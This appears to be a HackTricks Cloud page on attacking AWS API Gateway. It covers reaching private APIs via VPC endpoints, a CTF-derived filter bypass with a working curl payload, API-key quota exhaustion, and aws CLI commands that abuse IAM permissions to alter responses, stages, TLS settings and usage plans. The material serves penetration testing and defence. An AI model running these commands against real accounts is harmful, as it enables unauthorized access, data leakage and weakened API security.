{% hint style="success" %}
Learn & practice AWS Hacking:.png)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: .png)
HackTricks Training GCP Red Team Expert (GRTE).png)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information check:
{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} aws-api-gateway-enum.md {% endcontent-ref %}
You can create an endpoint in https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint with the service com.amazonaws.us-east-1.execute-api, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.
Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
This technique was found in this CTF writeup.
As indicated in the AWS documentation in the PassthroughBehavior section, by default, the value WHEN_NO_MATCH , when checking the Content-Type header of the request, will pass the request to the back end with no transformation.
Therefore, in the CTF the API Gateway had an integration template that was preventing the flag from being exfiltrated in a response when a request was sent with Content-Type: application/json:
{% code overflow="wrap" %}
RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'{% endcode %}
However, sending a request with Content-type: text/json would prevent that filter.
Finally, as the API Gateway was only allowing Get and Options, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header X-HTTP-Method-Override: GET:
{% code overflow="wrap" %}
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'{% endcode %}
In the Enumeration section you can see how to obtain the usage plan of the keys. If you have the key and it's limited to X usages per month, you could just use it and cause a DoS.
The API Key just need to be included inside a HTTP header called x-api-key.
An attacker with the permissions apigateway:UpdateGatewayResponse and apigateway:CreateDeployment can modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts.
{% code overflow="wrap" %}
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod{% endcode %}
Potential Impact: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
{% hint style="info" %} Need testing {% endhint %}
An attacker with the permissions apigateway:UpdateStage and apigateway:CreateDeployment can modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data.
{% code overflow="wrap" %}
API_ID="your-api-id"
STAGE_NAME="Prod"
# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod{% endcode %}
Potential Impact: Unauthorized access to cached data, disrupting or intercepting API traffic.
{% hint style="info" %} Need testing {% endhint %}
An attacker with the permissions apigateway:PutMethodResponse and apigateway:CreateDeployment can modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts.
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"
# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name ProdPotential Impact: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
{% hint style="info" %} Need testing {% endhint %}
An attacker with the permissions apigateway:UpdateRestApi and apigateway:CreateDeployment can modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API.
API_ID="your-api-id"
# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name ProdPotential Impact: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
{% hint style="info" %} Need testing {% endhint %}
apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey
An attacker with permissions apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, and apigateway:CreateUsagePlanKey can create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs.
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEYPotential Impact: Unauthorized access to API resources, bypassing security controls.
{% hint style="info" %} Need testing {% endhint %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.